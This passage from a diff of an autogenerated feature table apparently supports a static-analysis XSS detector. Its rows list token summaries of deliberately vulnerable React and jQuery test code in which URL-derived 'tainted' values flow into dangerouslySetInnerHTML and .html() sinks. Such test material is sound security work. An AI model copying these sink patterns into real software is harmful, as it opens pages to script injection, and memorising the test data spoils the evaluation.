element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16902,6 +117099,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:212:28:212:46 | this.state.tainted1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:212:28:212:46 | this.state.tainted1 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:212:28:212:46 | this.state.tainted1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:33:212:37 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:33:212:37 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:33:212:37 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:33:212:37 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:33:212:37 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:212:39:212:46 | tainted1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:212:39:212:46 | tainted1 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:212:39:212:46 | tainted1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:212:39:212:46 | tainted1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:212:39:212:46 | tainted1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:21 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | $('myId ... inted2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | $('myId ... inted2) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | $('myId ... inted2) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | $('myId ... inted2) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | $('myId ... inted2) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | exceptional return of $('myId ... inted2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | exceptional return of $('myId ... inted2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | exceptional return of $('myId ... inted2) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | exceptional return of $('myId ... inted2) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:13:213:47 | exceptional return of $('myId ... inted2) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:213:15:213:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:213:15:213:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:213:15:213:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16909,6 +117146,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:213:15:213:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:213:15:213:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:213:15:213:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:23:213:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:23:213:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:23:213:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:23:213:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:23:213:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:37 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:37 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:37 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:37 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:28:213:37 | this.state | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:213:28:213:46 | this.state.tainted2 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:213:28:213:46 | this.state.tainted2 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:213:28:213:46 | this.state.tainted2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16916,6 +117168,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:213:28:213:46 | this.state.tainted2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:213:28:213:46 | this.state.tainted2 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:213:28:213:46 | this.state.tainted2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:33:213:37 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:33:213:37 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:33:213:37 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:33:213:37 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:33:213:37 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:213:39:213:46 | tainted2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:213:39:213:46 | tainted2 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:213:39:213:46 | tainted2 | enclosingFunctionBody | tainted document location search React createElement div 